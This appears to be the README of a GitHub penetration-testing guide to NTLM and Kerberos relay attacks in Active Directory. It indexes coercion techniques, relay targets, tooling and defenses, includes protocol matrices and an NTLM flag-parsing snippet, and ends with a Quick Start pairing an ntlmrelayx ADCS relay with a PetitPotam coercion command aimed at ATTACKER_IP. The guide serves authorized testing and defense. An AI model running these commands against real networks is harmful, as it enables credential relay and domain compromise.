GitHub: rootsecdev/relay_bible
Stars: 177 | Forks: 22
# Relay Bible — Internal Penetration Testing Relay Guide
A comprehensive reference for NTLM relay attacks during authorized internal penetration tests. Covers authentication fundamentals, coercion techniques, per-protocol relay targets, tooling, advanced chaining, and defensive mitigations.
## Prerequisites
- A Linux attack host (Kali, Parrot, or similar)
- Python 3.10+ with Impacket installed
- Network access to the target environment (authorized engagement)
- Basic understanding of Active Directory and Windows networking
## Table of Contents
### 1. Fundamentals
- [NTLM Authentication & Relay Theory](01-fundamentals/ntlm-authentication.md) — How NTLM works, why relaying is possible, NTLMv1 vs v2, signing, EPA
- [Kerberos Authentication & Relay Theory](01-fundamentals/kerberos-authentication.md) — AS/TGS/AP exchange, SPN canonicalization, why Kerberos is still relayable
- [Identifying Relay Opportunities](01-fundamentals/identifying-targets.md) — Enumeration, finding hosts without signing, mapping attack surface
### 2. Coercion Techniques
- [Coercion Overview](02-coercion/overview.md) — Forcing machines to authenticate to your listener
- [PetitPotam (MS-EFSRPC)](02-coercion/petitpotam.md)
- [PrinterBug / SpoolSample (MS-RPRN)](02-coercion/printerbug.md)
- [DFSCoerce (MS-DFSNM)](02-coercion/dfscoerce.md)
- [ShadowCoerce (MS-FSRVP)](02-coercion/shadowcoerce.md)
### 3. Relay Targets (by protocol)
- [SMB Relay](03-relay-targets/smb.md) — Relay to SMB for code execution
- [LDAP / LDAPS Relay](03-relay-targets/ldap.md) — Delegate access, create machine accounts, RBCD
- [MSSQL Relay](03-relay-targets/mssql.md) — Relay to SQL Server for command execution
- [HTTP / WebDAV Relay](03-relay-targets/http-webdav.md) — Relay to web endpoints, WebDAV coercion
- [ADCS Attacks (ESC1–ESC15)](03-relay-targets/adcs.md) — All ADCS escalation techniques including relay
- [SMTP / IMAP Relay](03-relay-targets/smtp-imap.md) — Relay to Exchange/mail services
- [RPC / DCOM Relay](03-relay-targets/rpc-dcom.md) — Relay to RPC endpoints
- [SOCKS Proxy Relay](03-relay-targets/socks.md) — Maintain persistent relay sessions via SOCKS
### 4. Tool Setup & Usage
- [Responder](04-tools/responder.md) — Poisoning and capturing hashes
- [ntlmrelayx.py](04-tools/ntlmrelayx.md) — The primary relay framework
- [mitm6](04-tools/mitm6.md) — IPv6 DNS takeover for coercion
- [Certipy](04-tools/certipy.md) — ADCS enumeration and relay
- [Coercer](04-tools/coercer.md) — Automated coercion tool
- [krbrelayx](04-tools/krbrelayx.md) — Kerberos relay and delegation abuse
### 5. Advanced Techniques
- [Cross-Protocol Relay](05-advanced-techniques/cross-protocol.md) — Relay from one protocol to another
- [IPv6 Attack Chains](05-advanced-techniques/ipv6-chains.md) — mitm6 + relay combos
- [Relay Chaining & Pivoting](05-advanced-techniques/chaining.md) — Multi-hop relay scenarios
- [WebDAV Coercion Trick](05-advanced-techniques/webdav-coercion.md) — Forcing HTTP auth from machines
- [Kerberos Relay via DNS CNAME Abuse](05-advanced-techniques/kerberos-cname-relay.md) — Cymulate / CVE-2026-20929, Kerberos TGS relay via CNAME poisoning
### 6. Defense & Detection
- [Mitigations](06-defense/mitigations.md) — SMB signing, LDAP signing, EPA, disabling NTLM
- [Detection](06-defense/detection.md) — Log sources, Sigma rules, behavioral indicators
## Quick Reference: NTLM Relay — What Can Relay Where?
Applies to classic NTLM relay on modern (post-CVE-2019-1040) patched environments. For the more detailed cross-protocol breakdown, see [Cross-Protocol Relay](05-advanced-techniques/cross-protocol.md).
| Source Auth | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS |
|-------------|-------|--------|---------|--------|--------|---------|
| SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ |
| HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
\* Target must not require SMB signing
† SMB-sourced NTLM includes signing flags in NEGOTIATE, which LDAP and ADCS HTTP enforce — causing the relayed session to require a signing key the attacker does not have. This is why WebDAV/HTTP-sourced auth is preferred for LDAP and ADCS relay.
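To make the signing-flag footnote concrete, here is an added example (not code from relay_bible) that decodes the NegotiateFlags of an NTLM NEGOTIATE (Type 1) message and reports whether the client asked for signing or sealing, which is what a signing-aware LDAP or ADCS target keys on. The flag names and bit values follow MS-NLMP; the two sample messages are constructed to show both cases and are not captured traffic.

```python
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_MESSAGE = 1

# Subset of NegotiateFlags (MS-NLMP 2.2.2.5); the bit values are standard.
FLAGS = {
    "NEGOTIATE_UNICODE": 0x00000001,
    "REQUEST_TARGET": 0x00000004,
    "NEGOTIATE_SIGN": 0x00000010,
    "NEGOTIATE_SEAL": 0x00000020,
    "NEGOTIATE_NTLM": 0x00000200,
    "NEGOTIATE_ALWAYS_SIGN": 0x00008000,
    "NEGOTIATE_EXTENDED_SESSIONSECURITY": 0x00080000,
    "NEGOTIATE_128": 0x20000000,
    "NEGOTIATE_KEY_EXCH": 0x40000000,
    "NEGOTIATE_56": 0x80000000,
}

def parse_negotiate_flags(msg: bytes) -> int:
    """NegotiateFlags of a Type 1 message.
    Layout: Signature (8) | MessageType (4, LE) | NegotiateFlags (4, LE) | ..."""
    if len(msg) < 16 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type, flags = struct.unpack_from("<II", msg, 8)
    if msg_type != NEGOTIATE_MESSAGE:
        raise ValueError(f"expected NEGOTIATE (type 1), got type {msg_type}")
    return flags

def set_flags(flags: int) -> list[str]:
    """Names of the known flags present in a NegotiateFlags value."""
    return [name for name, bit in FLAGS.items() if flags & bit]

def requests_session_security(flags: int) -> bool:
    """True when the client asked for signing or sealing. A signing-aware target
    (LDAP, ADCS web enrollment) then expects a signed session the relay cannot
    produce. ALWAYS_SIGN alone does not count: nearly every client sets it."""
    return bool(flags & (FLAGS["NEGOTIATE_SIGN"] | FLAGS["NEGOTIATE_SEAL"]))

def build_negotiate(flags: int) -> bytes:
    """Constructed minimal Type 1 message with empty Domain/Workstation fields."""
    return NTLMSSP_SIGNATURE + struct.pack("<II", NEGOTIATE_MESSAGE, flags) + b"\x00" * 16

# Constructed samples: flag sets chosen to show both cases, not captured traffic.
COMMON = (FLAGS["NEGOTIATE_UNICODE"] | FLAGS["REQUEST_TARGET"] | FLAGS["NEGOTIATE_NTLM"]
          | FLAGS["NEGOTIATE_ALWAYS_SIGN"] | FLAGS["NEGOTIATE_EXTENDED_SESSIONSECURITY"]
          | FLAGS["NEGOTIATE_128"] | FLAGS["NEGOTIATE_KEY_EXCH"] | FLAGS["NEGOTIATE_56"])
SMB_STYLE = build_negotiate(COMMON | FLAGS["NEGOTIATE_SIGN"] | FLAGS["NEGOTIATE_SEAL"])
HTTP_STYLE = build_negotiate(COMMON)
```

Running `requests_session_security(parse_negotiate_flags(...))` over the first 16 bytes of a captured NTLMSSP blob tells you which row of the matrix a given client falls into, which is useful when validating detections or reviewing why a signing-enforcing target rejected a session.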
## Quick Reference: Kerberos Relay via DNS CNAME Abuse
The Cymulate / **CVE-2026-20929** primitive (Jan 2026) — attacker poisons DNS with a CNAME, Windows canonicalizes the SPN, client requests a TGS for the attacker's chosen target, AP-REQ is relayed. Because many services accept tickets based only on the **DNS portion** of the SPN, the source SPN class matters far less than in NTLM relay — what gates the attack is whether the target service enforces its own anti-relay control.
| Target service | Relayable unless... | Patch / status |
|----------------------|-------------------------------------------------------------|---------------------------------------------|
| SMB | SMB signing is **required** on the target | — |
| LDAP | LDAP signing is **required** | — |
| LDAPS | `LdapEnforceChannelBinding = 2` (Always) | — |
| HTTP / IIS | HTTP CBT enforced (`HTTP.sys` token checking = Require) | **CVE-2026-20929** backports HTTP.sys CBT |
| ADCS `/certsrv/` | Extended Protection = Require on the vdir | HTTP.sys CBT via CVE-2026-20929 applies |
| MSSQL | Extended Protection enabled | — |
| Exchange (OWA/ECP/…) | EPA on all virtual directories | — |
All rows assume the attacker has the network position needed to poison DNS (DHCPv6 via mitm6, ARP, rogue DHCPv4). Full technique: [Kerberos Relay via DNS CNAME Abuse](05-advanced-techniques/kerberos-cname-relay.md).
## Quick Start
1. **Enumerate** — Find hosts with signing disabled and identify coercion targets
2. **Position** — Start your relay listener (ntlmrelayx) pointing at your target
3. **Coerce** — Trigger authentication from a source machine to your listener
4. **Profit** — Relay captures and forwards the auth to your target protocol
```bash
# Classic example: coerce DC, relay to ADCS for a DC certificate
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
```